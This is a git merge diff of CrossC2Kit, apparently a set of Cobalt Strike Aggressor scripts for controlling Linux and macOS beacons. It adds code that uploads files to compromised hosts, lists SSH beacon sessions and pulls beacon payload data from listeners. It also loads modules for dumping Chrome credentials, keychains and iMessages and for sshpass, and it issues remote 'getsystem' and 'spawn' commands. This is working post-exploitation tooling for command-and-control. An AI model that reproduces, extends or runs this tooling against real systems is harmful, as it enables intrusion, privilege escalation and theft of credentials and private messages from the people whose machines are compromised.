Merge pull request #118 from gloxec/CrossC2Kit-dev

Update CrossC2Kit & support inject and sshpass

Former-commit-id: fd8bfcd

Author: gloxec

CrossC2Kit/CrossC2Kit.cna

@@ -133,7 +133,7 @@ sub bcrossc2_load_dyn_pro {
         berror($beaconid, "[ CrossC2 ]: dynamic lib or executable filetype not found");
     }
     $ELFName = genTaskinfo_dyn($taskType, $taskName, $taskResType, $taskNeedRun, $taskNeedPersistence, $taskXorKey, $juicySize, $taskArgs);
-    bupload_raw($beaconid,$ELFName,$juicyData);
+    bupload_raw!($beaconid,$ELFName,$juicyData);
 }
 
 sub bcrossc2_load_dyn {
@@ -163,7 +163,7 @@ sub bcrossc2_load_dyn {
         berror($beaconid, "[ CrossC2 ]: dynamic lib or executable filetype not found");
     }
     $ELFName = genTaskinfo_dyn($taskType, $taskName, $taskResType, $taskNeedRun, $taskNeedPersistence, $taskXorKey, $juicySize, $taskArgs);
-    bupload_raw($beaconid,$ELFName,$juicyData);
+    bupload_raw!($beaconid,$ELFName,$juicyData);
 }
 
 sub brun_script_in_mem {
@@ -187,5 +187,192 @@ sub brun_script_in_mem {
     $juicySize = lof($loadFileName);
 
     $scriptName = genMemScriptInfo($scriptType, $scriptEngPath, $taskResType, $juicySize, $taskArgs);
-    bupload_raw($beaconid,$scriptName,$juicyData);
+    bupload_raw!($beaconid,$scriptName,$juicyData);
+}
+
+@fileupload_list = @();
+global(@fileupload_list);
+sub bawait_upload {
+    local('$bid $file_lpath $file_rpath $file_rname $file_data $file_size $cb $handle $file_list_count');
+    $bid = $1;
+    $file_lpath = $2;
+    $file_rpath = $3;
+    $file_rname = $4;
+    $cb = $5;
+    $cb_args = $6;
+    $handle = openf($file_lpath);
+    $file_data = readb($handle, -1);
+    closef($handle);
+    $file_size = lof($file_lpath);
+
+    btask($bid, 'upload file '.$file_lpath.' to '.$file_rpath.$file_rname);
+
+    $file_list_count = size(@fileupload_list);
+    add(@fileupload_list, @($bid, $file_lpath, $file_rpath, $file_rname, $file_size, $cb, $cb_args, 'false' 'false'));
+    bupload_raw!($bid, $file_rpath.'/'.$file_rname, $file_data);
+}
+
+sub bawait_upload_raw {
+    local('$bid $file_lpath $file_rpath $file_rname $file_data $file_size $cb $handle $file_list_count');
+    $bid = $1;
+    $file_data = $2;
+    $file_rpath = $3;
+    $file_rname = $4;
+    $cb = $5;
+    $cb_args = $6;
+    $file_size = strlen($file_data);
+    $file_lpath = random_string(10);
+
+    btask($bid, 'upload rawData file-['.$file_lpath.'] to '.$file_rpath.$file_rname);
+
+    $file_list_count = size(@fileupload_list);
+    add(@fileupload_list, @($bid, $file_lpath, $file_rpath, $file_rname, $file_size, $cb, $cb_args, 'false' 'false'));
+    bupload_raw!($bid, $file_rpath.'/'.$file_rname, $file_data);
+}
+
+sub bcheck_file_size {
+    this('$bid $file_path $file_name $file_size $realsize $name $temp $f_rname $f_match_size ');
+    $bid = $1;
+    $file_path = $2;
+    $file_name = $3;
+    $file_size = $4;
+
+    bls($bid, $file_path, lambda({
+            this('@lines @subl $type $s $lastmod $name');
+            this('$file_name $file_size $realsize $f_key $f_value $f_rname')
+            @lines = split("\n", ["$3" trim]);
+            @subl = sublist(@lines, 1);
+            foreach $temp (@subl) {
+                ($type, $s, $lastmod, $name) = split("\t", $temp);
+                if ($name eq $file_name) {
+                    $realsize = long($s);
+                    if ($realsize >= $file_size) {
+                        foreach $f_key => $f_value (@fileupload_list) {
+                            $f_rname = $f_value[3];
+                            if ($name eq $f_rname) {
+                                @fileupload_list[$f_key][7] = 'true';
+                                break;
+                            }
+                        }
+                    }
+                    break;
+                }
+            }
+        }, $file_name => $file_name, $file_size => $file_size)
+    );
+}
+on heartbeat_1s {
+    local('$f_key $f_value $f_bid $f_lpath $f_rpath $f_rname $f_size $f_func $f_match_size');
+	if (size(@fileupload_list) > 0) {
+		foreach $f_key => $f_value (@fileupload_list) {
+            $f_bid = $f_value[0];
+            $f_lpath = $f_value[1];
+            $f_rpath = $f_value[2];
+            $f_rname = $f_value[3];
+            $f_size = $f_value[4];
+            $f_cb = $f_value[5];
+            $f_cb_args = $f_value[6];
+            $f_match_size = $f_value[7];
+            $f_cb_runed = $f_value[8];
+
+            if ($f_match_size eq 'false') {
+                bcheck_file_size($f_bid, $f_rpath, $f_rname, $f_size);
+            }
+            if ($f_match_size eq 'true') {
+                if ($f_cb_runed eq 'false') {
+                    @fileupload_list[$f_key][8] = 'true';
+                    [$f_cb: $f_bid, $f_cb_args];
+                    break;
+                }
+            }
+        }
+        foreach $f_key => $f_value (@fileupload_list) {
+            $f_match_size = $f_value[7];
+            if ($f_match_size eq 'true') {
+                removeAt(@fileupload_list, int($f_key));
+                break;
+            }
+        }
+	}
+}
+
+ssh_alias list_uploadingFile {
+    println(@fileupload_list);
+    $bid = $1;
+    local('$f_key $f_value $f_bid $f_lpath $f_rpath $f_rname $f_size $f_func $f_match_size');
+    if (size(@fileupload_list) > 0) {
+        foreach $f_key => $f_value (@fileupload_list) {
+            $f_bid = $f_value[0];
+            $f_lpath = $f_value[1];
+            $f_rpath = $f_value[2];
+            $f_rname = $f_value[3];
+            $f_size = $f_value[4];
+            $f_cb = $f_value[5];
+            $f_cb_args = $f_value[6];
+            $f_match_size = $f_value[7];
+            $f_cb_runed = $f_value[8];
+            blog($bid, $f_lpath);
+        }
+    }
+}
+
+sub getCrossC2Site {
+    local('%beacon_site $beacon_count $Description, $Proto, $Host, $Port, $URI');
+    %beacon_site = %();
+    $beacon_count = 0;
+    foreach $site_list(sites()) {
+        ($Description, $Proto, $Host, $Port, $URI) = values($site_list, @('Description', 'Proto', 'Host', 'Port', 'URI'));
+        if ("CrossC2" isin $Description) {
+            $beaconURL = $Proto.$Host.':'.$Port.$URI;
+            # 返回beacon_uri & beacon_description
+            %beacon_site[$beacon_count] = @($Description, $beaconURL);
+            $beacon_count += 1;
+        }
+    }
+    return %beacon_site;
+}
+
+sub getCrossC2Listener {
+    local('%beacon_listener $beacon_count');
+    %beacon_listener = %();
+    $beacon_count = 0;
+    foreach $listener(listeners_local()) {
+        if ("CrossC2" isin $listener) {
+            %beacon_listener[$beacon_count] = @($listener);
+            $beacon_count += 1;
+        }
+    }
+    return %beacon_listener;
+}
+
+sub getSSHSession {
+    local('%sessionMap $sessionCount');
+    %sessionMap = %();
+    $sessionCount = 0;
+    foreach $beacon (beacons()) {
+        ($internal, $computer) = values($beacon, @('internal', 'computer'));
+        $tempMenuBar = $internal."@".$computer;
+        if (!-isactive $beacon['id']) {
+        } else if (-isssh $beacon['id']) {
+            %sessionMap[$sessionCount] = @($tempMenuBar);
+            $sessionCount += 1;
+        }
+    }
+    return %sessionMap;
+}
+
+sub getCrossC2Beacon {
+    local('$listener $type $beaconData');
+    $listener = $1;
+    $type = $2;
+
+    $beaconData = $null;
+    if ($listener && $type) {
+        if ($type eq 'lib') {
+            $beaconData = listener_info($listener)['CrossC2libBeacon'];
+        } else if ($type eq 'main') {
+            $beaconData = listener_info($listener)['CrossC2Beacon'];
+        }
+    }
+    return $beaconData;
 }

CrossC2Kit/CrossC2Kit_Loader.cna

@@ -14,6 +14,8 @@ include(script_resource("gather/browser/chrome_dump.cna"));
 include(script_resource("gather/keychain/keychain_dump.cna"));
 include(script_resource("gather/message/iMessage_dump.cna"));
 include(script_resource("utils/portscan_result.cna"));
+include(script_resource("process/processhelper.cna"));
+include(script_resource("sshpass/sshpass.cna"));
 
 sub openMemoryFileLoadDialogCallBack {
     $taskFile = $3['taskFile'];
@@ -55,7 +57,7 @@ sub openMemoryFileLoadDialog {
 
 sub openPythonImportDialogDialogCallBack {
     $pythonFile = $3['pythonFile'];
-    blog($beaconid, $pythonFile);
+    btask($beaconid, $pythonFile);
     $taskResType = "info"; # info -> normal message
     $scriptType = 'python-import$';
     $scriptEnginePath = 'null';
@@ -67,7 +69,7 @@ sub openPythonImportDialogDialogCallBack {
     $filename = substr($scriptLocalPath, $pathIndex);
 
     $importName = substr($filename, 0, lindexOf($filename, '.'));
-    blog($1, "[Python]: import ".$importName);
+    btask($1, "[Python]: import ".$importName);
     $scriptType = $scriptType.$importName;
 
     if ($scriptType && $scriptLocalPath) {
@@ -103,7 +105,7 @@ sub openRunMemoryFileDialogCallBack {
     } else {
         $shell = "cc2-run ".$fileAliasName." ".$taskArgs;
     }
-    blog($beaconid, "[shell]: shell ".$shell);
+    btask($beaconid, "[shell]: shell ".$shell);
     bshell($beaconid, $shell);
 }
 
@@ -124,7 +126,7 @@ sub openRunMemoryFileDialog {
 sub openSetEnvDialogCallBack {
     $envKey = $3['envKey'];
     $envValue = $3['envValue'];
-    blog($beaconid, "[shell]: shell setenv $envKey $envValue");
+    btask($beaconid, "[shell]: shell setenv $envKey $envValue");
     bshell($beaconid, "setenv $envKey $envValue");
 }
 
@@ -145,19 +147,10 @@ popup ssh {
     menu "&Access" {
         item "&Elevate" { openElevateDialog($1); }
     }
-    menu "&Explore" {
-        item "&File Browser" { 
-            local('$bid');
-            foreach $bid ($1) {
-                openFileBrowser($bid);
-            }
-        }
-        item "&Process List" { openProcessBrowser($1); }
-    }
     menu "&CrossC2 Kit" {
         menu "&executable" {
             item "&list" {
-                blog($1, "[shell]: shell cc2-memoryList");
+                btask($1, "[shell]: shell cc2-memoryList");
                 bshell($1, "cc2-memoryList");
             }
             item "&load" {
@@ -176,28 +169,21 @@ popup ssh {
             openPythonImportDialog($1);
         }
     }
-    item "&Spawn" { 
-        local('$bid');
-        foreach $bid ($1) {
-            blog($bid, "[shell]: shell spawn");
-            bshell($bid, "spawn");
-        }
-    }
 }
 
 ssh_alias spawn {
-    blog($1, "[shell]: shell spawn");
+    btask($1, "[shell]: shell spawn");
     bshell($1, "spawn");
 }
 
 ssh_alias getsystem {
-    blog($1, "[shell]: shell getsystem");
+    btask($1, "[shell]: shell getsystem");
     bshell($1, "getsystem");
 }
 
 ssh_alias setenv {
     if($2 && $3){
-        blog($1, "[shell]: shell setenv $2 $3");
+        btask($1, "[shell]: shell setenv $2 $3");
         bshell($1, "setenv $2 $3");
     } else {
         berror($1, "*[error]: setenv env_name env_value");